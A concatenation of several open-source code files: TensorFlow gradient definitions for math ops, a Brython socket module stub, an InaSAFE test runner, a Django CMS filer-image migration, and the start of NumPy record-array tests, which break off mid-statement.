return (array_ops.reshape(math_ops.reduce_sum(math_ops.div(grad, y), rx), sx),
array_ops.reshape(
math_ops.reduce_sum(grad * math_ops.div(math_ops.div(-x, y), y),
ry), sy))
@ops.RegisterGradient("FloorDiv")
def _FloorDivGrad(_, unused_grad):
"""The gradient for the FloorDiv operator."""
return None, None
@ops.RegisterGradient("TruncateDiv")
def _TruncateDivGrad(_, unused_grad):
return None, None
@ops.RegisterGradient("RealDiv")
def _RealDivGrad(op, grad):
"""RealDiv op gradient."""
x = op.inputs[0]
y = op.inputs[1]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
# pylint: disable=protected-access
rx, ry = gen_array_ops._broadcast_gradient_args(sx, sy)
# pylint: enable=protected-access
x = math_ops.conj(x)
y = math_ops.conj(y)
return (array_ops.reshape(
math_ops.reduce_sum(math_ops.realdiv(grad, y), rx),
sx), array_ops.reshape(
math_ops.reduce_sum(grad * math_ops.realdiv(math_ops.realdiv(-x, y), y),
ry), sy))
@ops.RegisterGradient("Pow")
def _PowGrad(op, grad):
"""Returns grad * (y*x^(y-1), z*log(x))."""
x = op.inputs[0]
y = op.inputs[1]
z = op.outputs[0]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
rx, ry = gen_array_ops._broadcast_gradient_args(sx, sy)
x = math_ops.conj(x)
y = math_ops.conj(y)
z = math_ops.conj(z)
gx = array_ops.reshape(
math_ops.reduce_sum(grad * y * math_ops.pow(x, y - 1), rx), sx)
# Avoid false singularity at x = 0
if x.dtype.is_complex:
# real(x) < 0 is fine for the complex case
log_x = array_ops.where(
math_ops.not_equal(x, 0), math_ops.log(x), array_ops.zeros_like(x))
else:
# There's no sensible real value to return if x < 0, so return 0
log_x = array_ops.where(x > 0, math_ops.log(x), array_ops.zeros_like(x))
gy = array_ops.reshape(math_ops.reduce_sum(grad * z * log_x, ry), sy)
return gx, gy
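# The `where` guards above pin dz/dy to 0 at x == 0 for real x, matching the
# y > 0 limit of z * log(x) there and avoiding NaN from log(0).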
def _MaximumMinimumGrad(op, grad, selector_op):
"""Factor out the code for the gradient of Maximum or Minimum."""
x = op.inputs[0]
y = op.inputs[1]
gdtype = grad.dtype
sx = array_ops.shape(x)
sy = array_ops.shape(y)
gradshape = array_ops.shape(grad)
zeros = array_ops.zeros(gradshape, gdtype)
xmask = selector_op(x, y)
rx, ry = gen_array_ops._broadcast_gradient_args(sx, sy)
xgrad = array_ops.where(xmask, grad, zeros)
ygrad = array_ops.where(math_ops.logical_not(xmask), grad, zeros)
gx = array_ops.reshape(math_ops.reduce_sum(xgrad, rx), sx)
gy = array_ops.reshape(math_ops.reduce_sum(ygrad, ry), sy)
return (gx, gy)
@ops.RegisterGradient("Maximum")
def _MaximumGrad(op, grad):
"""Returns grad*(x > y, x <= y) with type of grad."""
return _MaximumMinimumGrad(op, grad, math_ops.greater_equal)
@ops.RegisterGradient("Minimum")
def _MinimumGrad(op, grad):
"""Returns grad*(x < y, x >= y) with type of grad."""
return _MaximumMinimumGrad(op, grad, math_ops.less_equal)
@ops.RegisterGradient("SquaredDifference")
def _SquaredDifferenceGrad(op, grad):
"""Returns the gradient for (x-y)^2."""
x = op.inputs[0]
y = op.inputs[1]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
# pylint: disable=protected-access
rx, ry = gen_array_ops._broadcast_gradient_args(sx, sy)
# pylint: enable=protected-access
# .op works with Tensors or IndexedSlices
with ops.control_dependencies([grad.op]):
# The parens ensure that if grad is IndexedSlices, it'll get multiplied by
# Tensor (not a number like 2.0) which causes it to convert to Tensor.
x_grad = math_ops.scalar_mul(2.0, grad) * (x - y)
return (array_ops.reshape(math_ops.reduce_sum(x_grad, rx), sx),
-array_ops.reshape(math_ops.reduce_sum(x_grad, ry), sy))
# Logical operations have no gradients.
ops.NotDifferentiable("Less")
ops.NotDifferentiable("LessEqual")
ops.NotDifferentiable("Greater")
ops.NotDifferentiable("GreaterEqual")
ops.NotDifferentiable("Equal")
ops.NotDifferentiable("ApproximateEqual")
ops.NotDifferentiable("NotEqual")
ops.NotDifferentiable("LogicalAnd")
ops.NotDifferentiable("LogicalOr")
ops.NotDifferentiable("LogicalNot")
@ops.RegisterGradient("Select")
def _SelectGrad(op, grad):
c = op.inputs[0]
x = op.inputs[1]
zeros = array_ops.zeros_like(x)
return (None, array_ops.where(c, grad, zeros),
array_ops.where(c, zeros, grad))
@ops.RegisterGradient("MatMul")
def _MatMulGrad(op, grad):
"""Gradient for MatMul."""
t_a = op.get_attr("transpose_a")
t_b = op.get_attr("transpose_b")
a = math_ops.conj(op.inputs[0])
b = math_ops.conj(op.inputs[1])
if not t_a and not t_b:
grad_a = math_ops.matmul(grad, b, transpose_b=True)
grad_b = math_ops.matmul(a, grad, transpose_a=True)
elif not t_a and t_b:
grad_a = math_ops.matmul(grad, b)
grad_b = math_ops.matmul(grad, a, transpose_a=True)
elif t_a and not t_b:
grad_a = math_ops.matmul(b, grad, transpose_b=True)
grad_b = math_ops.matmul(a, grad)
elif t_a and t_b:
grad_a = math_ops.matmul(b, grad, transpose_a=True, transpose_b=True)
grad_b = math_ops.matmul(grad, a, transpose_a=True, transpose_b=True)
return grad_a, grad_b
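# Shape check for the default case (no transposes), as a sketch:
# a [m, k] @ b [k, n] gives grad [m, n]; grad @ b^T is [m, k] (matches a) and
# a^T @ grad is [k, n] (matches b).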
@ops.RegisterGradient("SparseMatMul")
def _SparseMatMulGrad(op, grad):
"""Gradient for SparseMatMul."""
t_a = op.get_attr("transpose_a")
t_b = op.get_attr("transpose_b")
is_sparse = {
op.inputs[0]: op.get_attr("a_is_sparse"),
op.inputs[1]: op.get_attr("b_is_sparse"),
# Use heuristic to figure out if grad might be sparse
grad: (grad.op.type == "ReluGrad")
}
def _SparseMatMul(t1, t2, out_dtype, transpose_a=False, transpose_b=False):
"""Helper function to create SparseMatMul op."""
assert t1 in is_sparse and t2 in is_sparse
t1_sparse = is_sparse[t1]
t2_sparse = is_sparse[t2]
if transpose_b:
t2 = array_ops.transpose(t2)
transpose_b = False
prod = math_ops.matmul(
t1,
t2,
transpose_a=transpose_a,
transpose_b=transpose_b,
a_is_sparse=t1_sparse,
b_is_sparse=t2_sparse)
if prod.dtype != out_dtype:
prod = math_ops.cast(prod, out_dtype)
return prod
dtype_a = op.inputs[0].dtype
dtype_b = op.inputs[1].dtype
if not t_a and not t_b:
return (_SparseMatMul(
grad, op.inputs[1], dtype_a, transpose_b=True), _SparseMatMul(
op.inputs[0], grad, dtype_b, transpose_a=True))
elif not t_a and t_b:
return (_SparseMatMul(grad, op.inputs[1], dtype_a), _SparseMatMul(
grad, op.inputs[0], dtype_b, transpose_a=True))
elif t_a and not t_b:
return (_SparseMatMul(
op.inputs[1], grad, dtype_a, transpose_b=True),
_SparseMatMul(op.inputs[0], grad, dtype_b))
elif t_a and t_b:
return (_SparseMatMul(
op.inputs[1], grad, dtype_a, transpose_a=True,
transpose_b=True), _SparseMatMul(
grad, op.inputs[0], dtype_b, transpose_a=True, transpose_b=True))
@ops.RegisterGradient("Floor")
def _FloorGrad(_, unused_grad):
return [None]
@ops.RegisterGradient("Ceil")
def _CeilGrad(_, unused_grad):
return [None]
@ops.RegisterGradient("Round")
def _RoundGrad(_, unused_grad):
return [None]
@ops.RegisterGradient("Rint")
def _RintGrad(_, unused_grad):
# the gradient of Rint is zero
return [None]
@ops.RegisterGradient("BatchMatMul")
def _BatchMatMul(op, grad):
"""Returns the gradient of x and y given the gradient of x * y."""
x = op.inputs[0]
y = op.inputs[1]
adj_x = op.get_attr("adj_x")
adj_y = op.get_attr("adj_y")
if not adj_x:
if not adj_y:
grad_x = math_ops.matmul(grad, y, adjoint_a=False, adjoint_b=True)
grad_y = math_ops.matmul(x, grad, adjoint_a=True, adjoint_b=False)
else:
grad_x = math_ops.matmul(grad, y, adjoint_a=False, adjoint_b=False)
grad_y = math_ops.matmul(grad, x, adjoint_a=True, adjoint_b=False)
else:
if not adj_y:
grad_x = math_ops.matmul(y, grad, adjoint_a=False, adjoint_b=True)
grad_y = math_ops.matmul(x, grad, adjoint_a=False, adjoint_b=False)
else:
grad_x = math_ops.matmul(y, grad, adjoint_a=True, adjoint_b=True)
grad_y = math_ops.matmul(grad, x, adjoint_a=True, adjoint_b=True)
return grad_x, grad_y
ops.NotDifferentiable("Range")
ops.NotDifferentiable("LinSpace")
@ops.RegisterGradient("Complex")
def _ComplexGrad(op, grad):
"""Returns the real and imaginary components of 'grad', respectively."""
x = op.inputs[0]
y = op.inputs[1]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
rx, ry = gen_array_ops._broadcast_gradient_args(sx, sy)
return (array_ops.reshape(math_ops.reduce_sum(math_ops.real(grad), rx), sx),
array_ops.reshape(math_ops.reduce_sum(math_ops.imag(grad), ry), sy))
@ops.RegisterGradient("Real")
def _RealGrad(_, grad):
"""Returns 'grad' as the real part and set the imaginary part 0."""
zero = constant_op.constant(0, dtype=grad.dtype)
return math_ops.complex(grad, zero)
@ops.RegisterGradient("Imag")
def _ImagGrad(_, grad):
"""Returns 'grad' as the imaginary part and set the real part 0."""
zero = constant_op.constant(0, dtype=grad.dtype)
return math_ops.complex(zero, grad)
@ops.RegisterGradient("Conj")
def _ConjGrad(_, grad):
"""Returns the complex conjugate of grad."""
return math_ops.conj(grad)
@ops.RegisterGradient("ComplexAbs")
def _ComplexAbsGrad(op, grad):
"""Returns the gradient of ComplexAbs."""
# TODO(b/27786104): The cast to complex could be removed once arithmetic
# supports mixtures of complex64 and real values.
return (math_ops.complex(grad, array_ops.zeros_like(grad)) *
math_ops.sign(op.inputs[0]))
@ops.RegisterGradient("Cast")
def _CastGrad(op, grad):
t = [
dtypes.float16, dtypes.float32, dtypes.float64, dtypes.bfloat16,
dtypes.complex64, dtypes.complex128
]
src_type = op.inputs[0].dtype.base_dtype
dst_type = grad.dtype.base_dtype
if src_type in t and dst_type in t:
return math_ops.cast(grad, src_type)
else:
return None
@ops.RegisterGradient("Cross")
def _CrossGrad(op, grad):
u = op.inputs[0]
v = op.inputs[1]
return (math_ops.cross(v, grad), math_ops.cross(grad, u))
@ops.RegisterGradient("Cumsum")
def _CumsumGrad(op, grad):
axis = op.inputs[1]
exclusive = op.get_attr("exclusive")
reverse = op.get_attr("reverse")
return [
math_ops.cumsum(
grad, axis, exclusive=exclusive, reverse=not reverse), None
]
@ops.RegisterGradient("Cumprod")
def _CumprodGrad(op, grad):
x = op.inputs[0]
axis = op.inputs[1]
exclusive = op.get_attr("exclusive")
reverse = op.get_attr("reverse")
# TODO: this fails when x contains 0 and should be fixed.
prod = math_ops.cumprod(x, axis, exclusive=exclusive, reverse=reverse)
out = math_ops.cumsum(
prod * grad, axis, exclusive=exclusive, reverse=not reverse)
return [out / x, None]
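# Hypothetical illustration (not in the original file) of the TODO above:
# the final `out / x` division is undefined wherever x contains a zero.
def _cumprod_grad_zero_example():
    import numpy as np
    x = np.array([1.0, 0.0, 2.0])
    prod = np.cumprod(x)                                   # [1., 0., 0.]
    out = np.cumsum((prod * np.ones_like(x))[::-1])[::-1]  # reverse cumsum
    with np.errstate(divide='ignore', invalid='ignore'):
        return out / x                                     # nan at the zero entry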
| apache-2.0 | -7,581,199,566,476,697,000 | 31.39751 | 88 | 0.659551 | false |
40223249-1/2015cd_midterm2 | static/Brython3.1.1-20150328-091302/Lib/_socket.py | 742 | 6431 | """Implementation module for socket operations.
See the socket module for documentation."""
AF_APPLETALK = 16
AF_DECnet = 12
AF_INET = 2
AF_INET6 = 23
AF_IPX = 6
AF_IRDA = 26
AF_SNA = 11
AF_UNSPEC = 0
AI_ADDRCONFIG = 1024
AI_ALL = 256
AI_CANONNAME = 2
AI_NUMERICHOST = 4
AI_NUMERICSERV = 8
AI_PASSIVE = 1
AI_V4MAPPED = 2048
CAPI = '<capsule object "_socket.CAPI" at 0x00BC4F38>'
EAI_AGAIN = 11002
EAI_BADFLAGS = 10022
EAI_FAIL = 11003
EAI_FAMILY = 10047
EAI_MEMORY = 8
EAI_NODATA = 11001
EAI_NONAME = 11001
EAI_SERVICE = 10109
EAI_SOCKTYPE = 10044
INADDR_ALLHOSTS_GROUP = -536870911
INADDR_ANY = 0
INADDR_BROADCAST = -1
INADDR_LOOPBACK = 2130706433
INADDR_MAX_LOCAL_GROUP = -536870657
INADDR_NONE = -1
INADDR_UNSPEC_GROUP = -536870912
IPPORT_RESERVED = 1024
IPPORT_USERRESERVED = 5000
IPPROTO_ICMP = 1
IPPROTO_IP = 0
IPPROTO_RAW = 255
IPPROTO_TCP = 6
IPPROTO_UDP = 17
IPV6_CHECKSUM = 26
IPV6_DONTFRAG = 14
IPV6_HOPLIMIT = 21
IPV6_HOPOPTS = 1
IPV6_JOIN_GROUP = 12
IPV6_LEAVE_GROUP = 13
IPV6_MULTICAST_HOPS = 10
IPV6_MULTICAST_IF = 9
IPV6_MULTICAST_LOOP = 11
IPV6_PKTINFO = 19
IPV6_RECVRTHDR = 38
IPV6_RECVTCLASS = 40
IPV6_RTHDR = 32
IPV6_TCLASS = 39
IPV6_UNICAST_HOPS = 4
IPV6_V6ONLY = 27
IP_ADD_MEMBERSHIP = 12
IP_DROP_MEMBERSHIP = 13
IP_HDRINCL = 2
IP_MULTICAST_IF = 9
IP_MULTICAST_LOOP = 11
IP_MULTICAST_TTL = 10
IP_OPTIONS = 1
IP_RECVDSTADDR = 25
IP_TOS = 3
IP_TTL = 4
MSG_BCAST = 1024
MSG_CTRUNC = 512
MSG_DONTROUTE = 4
MSG_MCAST = 2048
MSG_OOB = 1
MSG_PEEK = 2
MSG_TRUNC = 256
NI_DGRAM = 16
NI_MAXHOST = 1025
NI_MAXSERV = 32
NI_NAMEREQD = 4
NI_NOFQDN = 1
NI_NUMERICHOST = 2
NI_NUMERICSERV = 8
RCVALL_MAX = 3
RCVALL_OFF = 0
RCVALL_ON = 1
RCVALL_SOCKETLEVELONLY = 2
SHUT_RD = 0
SHUT_RDWR = 2
SHUT_WR = 1
SIO_KEEPALIVE_VALS = 2550136836
SIO_RCVALL = 2550136833
SOCK_DGRAM = 2
SOCK_RAW = 3
SOCK_RDM = 4
SOCK_SEQPACKET = 5
SOCK_STREAM = 1
SOL_IP = 0
SOL_SOCKET = 65535
SOL_TCP = 6
SOL_UDP = 17
SOMAXCONN = 2147483647
SO_ACCEPTCONN = 2
SO_BROADCAST = 32
SO_DEBUG = 1
SO_DONTROUTE = 16
SO_ERROR = 4103
SO_EXCLUSIVEADDRUSE = -5
SO_KEEPALIVE = 8
SO_LINGER = 128
SO_OOBINLINE = 256
SO_RCVBUF = 4098
SO_RCVLOWAT = 4100
SO_RCVTIMEO = 4102
SO_REUSEADDR = 4
SO_SNDBUF = 4097
SO_SNDLOWAT = 4099
SO_SNDTIMEO = 4101
SO_TYPE = 4104
SO_USELOOPBACK = 64
class SocketType:
pass
TCP_MAXSEG = 4
TCP_NODELAY = 1
__loader__ = '<_frozen_importlib.ExtensionFileLoader object at 0x00CA2D90>'
def dup(*args,**kw):
"""dup(integer) -> integer
Duplicate an integer socket file descriptor. This is like os.dup(), but for
sockets; on some platforms os.dup() won't work for socket file descriptors."""
pass
class error:
pass
class gaierror:
pass
def getaddrinfo(*args,**kw):
"""getaddrinfo(host, port [, family, socktype, proto, flags]) -> list of (family, socktype, proto, canonname, sockaddr)
Resolve host and port into addrinfo struct."""
pass
def getdefaulttimeout(*args,**kw):
"""getdefaulttimeout() -> timeout
Returns the default timeout in seconds (float) for new socket objects.
A value of None indicates that new socket objects have no timeout.
When the socket module is first imported, the default is None."""
pass
def gethostbyaddr(*args,**kw):
"""gethostbyaddr(host) -> (name, aliaslist, addresslist)
Return the true host name, a list of aliases, and a list of IP addresses,
for a host. The host argument is a string giving a host name or IP number."""
pass
def gethostbyname(*args,**kw):
"""gethostbyname(host) -> address
Return the IP address (a string of the form '255.255.255.255') for a host."""
pass
def gethostbyname_ex(*args,**kw):
"""gethostbyname_ex(host) -> (name, aliaslist, addresslist)
Return the true host name, a list of aliases, and a list of IP addresses,
for a host. The host argument is a string giving a host name or IP number."""
pass
def gethostname(*args,**kw):
"""gethostname() -> string
Return the current host name."""
pass
def getnameinfo(*args,**kw):
"""getnameinfo(sockaddr, flags) --> (host, port)
Get host and port for a sockaddr."""
pass
def getprotobyname(*args,**kw):
"""getprotobyname(name) -> integer
Return the protocol number for the named protocol. (Rarely used.)"""
pass
def getservbyname(*args,**kw):
"""getservbyname(servicename[, protocolname]) -> integer
Return a port number from a service name and protocol name.
The optional protocol name, if given, should be 'tcp' or 'udp',
otherwise any protocol will match."""
pass
def getservbyport(*args,**kw):
"""getservbyport(port[, protocolname]) -> string
Return the service name from a port number and protocol name.
The optional protocol name, if given, should be 'tcp' or 'udp',
otherwise any protocol will match."""
pass
has_ipv6 = True
class herror:
pass
def htonl(*args,**kw):
"""htonl(integer) -> integer
Convert a 32-bit integer from host to network byte order."""
pass
def htons(*args,**kw):
"""htons(integer) -> integer
Convert a 16-bit integer from host to network byte order."""
pass
def inet_aton(*args,**kw):
"""inet_aton(string) -> bytes giving packed 32-bit IP representation
Convert an IP address in string format (123.45.67.89) to the 32-bit packed
binary format used in low-level network functions."""
pass
def inet_ntoa(*args,**kw):
"""inet_ntoa(packed_ip) -> ip_address_string
Convert an IP address from 32-bit packed binary format to string format"""
pass
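# Hypothetical illustration (these stubs do nothing in Brython): on CPython
# the packed form is just the four octets as raw bytes, so the pair above
# round-trips dotted-quad strings.
def _inet_roundtrip_example():
    import struct
    packed = struct.pack('!4B', 123, 45, 67, 89)   # what inet_aton returns
    return '.'.join(str(b) for b in packed)        # '123.45.67.89' on Python 3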
def ntohl(*args,**kw):
"""ntohl(integer) -> integer
Convert a 32-bit integer from network to host byte order."""
pass
def ntohs(*args,**kw):
"""ntohs(integer) -> integer
Convert a 16-bit integer from network to host byte order."""
pass
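# Minimal sketch (not part of this stub module): htons/ntohs behave like
# packing and unpacking a 16-bit value in struct's network byte order.
def _byteorder_example():
    import struct
    port = 8080
    packed = struct.pack('!H', port)               # big-endian (network) bytes
    assert struct.unpack('!H', packed)[0] == port
    return packed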
def setdefaulttimeout(*args,**kw):
"""setdefaulttimeout(timeout)
Set the default timeout in seconds (float) for new socket objects.
A value of None indicates that new socket objects have no timeout.
When the socket module is first imported, the default is None."""
pass
class socket:
def __init__(self,*args,**kw):
pass
def bind(self,*args,**kw):
pass
def close(self):
pass
class timeout:
pass
| agpl-3.0 | 1,789,140,905,586,452,700 | 16.381081 | 130 | 0.665837 | false |
AIFDR/inasafe | test_suite.py | 3 | 3260 | # coding=utf-8
"""
Test Suite for InaSAFE.
Contact : etienne at kartoza dot com
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
import sys
import os
import unittest
import qgis # NOQA For SIP API to V2 if run outside of QGIS
try:
from pip import main as pipmain
except ImportError:
from pip._internal import main as pipmain
try:
import coverage
except ImportError:
pipmain(['install', 'coverage'])
import coverage
import tempfile
from osgeo import gdal
from qgis.PyQt import Qt
from safe.utilities.gis import qgis_version
__author__ = 'etiennetrimaille'
__revision__ = '$Format:%H$'
__date__ = '14/06/2016'
__copyright__ = (
'Copyright 2012, Australia Indonesia Facility for Disaster Reduction')
def _run_tests(test_suite, package_name, with_coverage=False):
"""Core function to test a test suite."""
count = test_suite.countTestCases()
print('########')
print('%s tests has been discovered in %s' % (count, package_name))
print('QGIS : %s' % qgis_version())
print('Python GDAL : %s' % gdal.VersionInfo('VERSION_NUM'))
print('QT : %s' % Qt.QT_VERSION_STR)
print('Run slow tests : %s' % (not os.environ.get('ON_TRAVIS', False)))
print('########')
if with_coverage:
cov = coverage.Coverage(
source=['safe/'],
omit=['*/test/*', 'safe/definitions/*'],
)
cov.start()
unittest.TextTestRunner(verbosity=3, stream=sys.stdout).run(test_suite)
if with_coverage:
cov.stop()
cov.save()
report = tempfile.NamedTemporaryFile(delete=False)
cov.report(file=report)
# Produce HTML reports in the `htmlcov` folder and open index.html
# cov.html_report()
report.close()
with open(report.name, 'r') as fin:
print(fin.read())
def test_package(package='safe'):
"""Test package.
This function is called by travis without arguments.
:param package: The package to test.
:type package: str
"""
test_loader = unittest.defaultTestLoader
try:
test_suite = test_loader.discover(package)
except ImportError:
test_suite = unittest.TestSuite()
_run_tests(test_suite, package)
def test_environment():
"""Test package with an environment variable."""
package = os.environ.get('TESTING_PACKAGE', 'safe')
test_loader = unittest.defaultTestLoader
test_suite = test_loader.discover(package)
_run_tests(test_suite, package)
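# Usage sketch (assumed, not part of the original file): pick the package
# through the environment variable read above, for example:
#   TESTING_PACKAGE=safe.gui python -c 'import test_suite; test_suite.test_environment()'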
def test_manually():
"""Test manually a test class.
You can change this function as much as you want.
"""
from safe.test.test_init import TestInit
test_suite = unittest.makeSuite(TestInit, 'test')
_run_tests(test_suite, 'custom test class')
def test_one():
"""Run a single test"""
from safe.gui.tools.test.test_extent_selector import ExtentSelectorTest
test_runner = unittest.TextTestRunner(verbosity=3, stream=sys.stdout)
test_runner.run(unittest.makeSuite(ExtentSelectorTest, 'test'))
if __name__ == '__main__':
test_package()
| gpl-3.0 | 7,030,695,755,003,612,000 | 27.849558 | 78 | 0.657362 | false |
Venturi/oldcms | env/lib/python2.7/site-packages/cmsplugin_filer_image/migrations_django/0001_initial.py | 8 | 4643 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
import filer.fields.file
import filer.fields.image
import cms.models.fields
class Migration(migrations.Migration):
dependencies = [
('cms', '0003_auto_20140926_2347'),
('filer', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='FilerImage',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('style', models.CharField(max_length=50, verbose_name='Style', default=settings.CMSPLUGIN_FILER_IMAGE_DEFAULT_STYLE, blank=True, choices=settings.CMSPLUGIN_FILER_IMAGE_STYLE_CHOICES)),
('caption_text', models.CharField(max_length=255, null=True, verbose_name='caption text', blank=True)),
('image_url', models.URLField(default=None, null=True, verbose_name='alternative image url', blank=True)),
('alt_text', models.CharField(max_length=255, null=True, verbose_name='alt text', blank=True)),
('use_original_image', models.BooleanField(default=False, help_text='do not resize the image. use the original image instead.', verbose_name='use the original image')),
('use_autoscale', models.BooleanField(default=False, help_text='tries to auto scale the image based on the placeholder context', verbose_name='use automatic scaling')),
('width', models.PositiveIntegerField(null=True, verbose_name='width', blank=True)),
('height', models.PositiveIntegerField(null=True, verbose_name='height', blank=True)),
('crop', models.BooleanField(default=True, verbose_name='crop')),
('upscale', models.BooleanField(default=True, verbose_name='upscale')),
('alignment', models.CharField(blank=True, max_length=10, null=True, verbose_name='image alignment', choices=[('left', 'left'), ('right', 'right')])),
('free_link', models.CharField(help_text='if present image will be clickable', max_length=255, null=True, verbose_name='link', blank=True)),
('original_link', models.BooleanField(default=False, help_text='if present image will be clickable', verbose_name='link original image')),
('description', models.TextField(null=True, verbose_name='description', blank=True)),
('target_blank', models.BooleanField(default=False, verbose_name='Open link in new window')),
('file_link', filer.fields.file.FilerFileField(related_name='+', default=None, to='filer.File', blank=True, help_text='if present image will be clickable', null=True, verbose_name='file link')),
('image', filer.fields.image.FilerImageField(default=None, blank=True, to='filer.Image', null=True, verbose_name='image')),
('page_link', cms.models.fields.PageField(blank=True, to='cms.Page', help_text='if present image will be clickable', null=True, verbose_name='page link')),
],
options={
'verbose_name': 'filer image',
'verbose_name_plural': 'filer images',
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='ThumbnailOption',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=100, verbose_name='name')),
('width', models.IntegerField(help_text='width in pixel.', verbose_name='width')),
('height', models.IntegerField(help_text='height in pixel.', verbose_name='height')),
('crop', models.BooleanField(default=True, verbose_name='crop')),
('upscale', models.BooleanField(default=True, verbose_name='upscale')),
],
options={
'ordering': ('width', 'height'),
'verbose_name': 'thumbnail option',
'verbose_name_plural': 'thumbnail options',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='filerimage',
name='thumbnail_option',
field=models.ForeignKey(blank=True, to='cmsplugin_filer_image.ThumbnailOption', help_text='overrides width, height, crop and upscale with values from the selected thumbnail option', null=True, verbose_name='thumbnail option'),
preserve_default=True,
),
]
| apache-2.0 | 2,109,889,139,699,377,700 | 64.394366 | 238 | 0.622012 | false |
jschueller/numpy | numpy/core/tests/test_records.py | 42 | 11668 | from __future__ import division, absolute_import, print_function
import sys
import collections
import pickle
from os import path
import numpy as np
from numpy.compat import asbytes
from numpy.testing import (
TestCase, run_module_suite, assert_, assert_equal, assert_array_equal,
assert_array_almost_equal, assert_raises
)
class TestFromrecords(TestCase):
def test_fromrecords(self):
r = np.rec.fromrecords([[456, 'dbe', 1.2], [2, 'de', 1.3]],
names='col1,col2,col3')
assert_equal(r[0].item(), (456, 'dbe', 1.2))
assert_equal(r['col1'].dtype.kind, 'i')
if sys.version_info[0] >= 3:
assert_equal(r['col2'].dtype.kind, 'U')
assert_equal(r['col2'].dtype.itemsize, 12)
else:
assert_equal(r['col2'].dtype.kind, 'S')
assert_equal(r['col2'].dtype.itemsize, 3)
assert_equal(r['col3'].dtype.kind, 'f')
def test_method_array(self):
r = np.rec.array(asbytes('abcdefg') * 100, formats='i2,a3,i4', shape=3, byteorder='big')
assert_equal(r[1].item(), (25444, asbytes('efg'), 1633837924))
def test_method_array2(self):
r = np.rec.array([(1, 11, 'a'), (2, 22, 'b'), (3, 33, 'c'), (4, 44, 'd'), (5, 55, 'ex'),
(6, 66, 'f'), (7, 77, 'g')], formats='u1,f4,a1')
assert_equal(r[1].item(), (2, 22.0, asbytes('b')))
def test_recarray_slices(self):
r = np.rec.array([(1, 11, 'a'), (2, 22, 'b'), (3, 33, 'c'), (4, 44, 'd'), (5, 55, 'ex'),
(6, 66, 'f'), (7, 77, 'g')], formats='u1,f4,a1')
assert_equal(r[1::2][1].item(), (4, 44.0, asbytes('d')))
def test_recarray_fromarrays(self):
x1 = np.array([1, 2, 3, 4])
x2 = np.array(['a', 'dd', 'xyz', '12'])
x3 = np.array([1.1, 2, 3, 4])
r = np.rec.fromarrays([x1, x2, x3], names='a,b,c')
assert_equal(r[1].item(), (2, 'dd', 2.0))
x1[1] = 34
assert_equal(r.a, np.array([1, 2, 3, 4]))
def test_recarray_fromfile(self):
data_dir = path.join(path.dirname(__file__), 'data')
filename = path.join(data_dir, 'recarray_from_file.fits')
fd = open(filename, 'rb')
fd.seek(2880 * 2)
r1 = np.rec.fromfile(fd, formats='f8,i4,a5', shape=3, byteorder='big')
fd.seek(2880 * 2)
r2 = np.rec.array(fd, formats='f8,i4,a5', shape=3, byteorder='big')
fd.close()
assert_equal(r1, r2)
def test_recarray_from_obj(self):
count = 10
a = np.zeros(count, dtype='O')
b = np.zeros(count, dtype='f8')
c = np.zeros(count, dtype='f8')
for i in range(len(a)):
a[i] = list(range(1, 10))
mine = np.rec.fromarrays([a, b, c], names='date,data1,data2')
for i in range(len(a)):
assert_((mine.date[i] == list(range(1, 10))))
assert_((mine.data1[i] == 0.0))
assert_((mine.data2[i] == 0.0))
def test_recarray_from_repr(self):
a = np.array([(1,'ABC'), (2, "DEF")],
dtype=[('foo', int), ('bar', 'S4')])
recordarr = np.rec.array(a)
recarr = a.view(np.recarray)
recordview = a.view(np.dtype((np.record, a.dtype)))
recordarr_r = eval("numpy." + repr(recordarr), {'numpy': np})
recarr_r = eval("numpy." + repr(recarr), {'numpy': np})
recordview_r = eval("numpy." + repr(recordview), {'numpy': np})
assert_equal(type(recordarr_r), np.recarray)
assert_equal(recordarr_r.dtype.type, np.record)
assert_equal(recordarr, recordarr_r)
assert_equal(type(recarr_r), np.recarray)
assert_equal(recarr_r.dtype.type, np.record)
assert_equal(recarr, recarr_r)
assert_equal(type(recordview_r), np.ndarray)
assert_equal(recordview.dtype.type, np.record)
assert_equal(recordview, recordview_r)
def test_recarray_views(self):
a = np.array([(1,'ABC'), (2, "DEF")],
dtype=[('foo', int), ('bar', 'S4')])
b = np.array([1,2,3,4,5], dtype=np.int64)
#check that np.rec.array gives right dtypes
assert_equal(np.rec.array(a).dtype.type, np.record)
assert_equal(type(np.rec.array(a)), np.recarray)
assert_equal(np.rec.array(b).dtype.type, np.int64)
assert_equal(type(np.rec.array(b)), np.recarray)
#check that viewing as recarray does the same
assert_equal(a.view(np.recarray).dtype.type, np.record)
assert_equal(type(a.view(np.recarray)), np.recarray)
assert_equal(b.view(np.recarray).dtype.type, np.int64)
assert_equal(type(b.view(np.recarray)), np.recarray)
#check that view to non-structured dtype preserves type=np.recarray
r = np.rec.array(np.ones(4, dtype="f4,i4"))
rv = r.view('f8').view('f4,i4')
assert_equal(type(rv), np.recarray)
assert_equal(rv.dtype.type, np.record)
#check that we can undo the view
arrs = [np.ones(4, dtype='f4,i4'), np.ones(4, dtype='f8')]
for arr in arrs:
rec = np.rec.array(arr)
# recommended way to view as an ndarray:
arr2 = rec.view(rec.dtype.fields or rec.dtype, np.ndarray)
assert_equal(arr2.dtype.type, arr.dtype.type)
assert_equal(type(arr2), type(arr))
def test_recarray_repr(self):
# make sure non-structured dtypes also show up as rec.array
a = np.array(np.ones(4, dtype='f8'))
assert_(repr(np.rec.array(a)).startswith('rec.array'))
def test_recarray_from_names(self):
ra = np.rec.array([
(1, 'abc', 3.7000002861022949, 0),
(2, 'xy', 6.6999998092651367, 1),
(0, ' ', 0.40000000596046448, 0)],
names='c1, c2, c3, c4')
pa = np.rec.fromrecords([
(1, 'abc', 3.7000002861022949, 0),
(2, 'xy', 6.6999998092651367, 1),
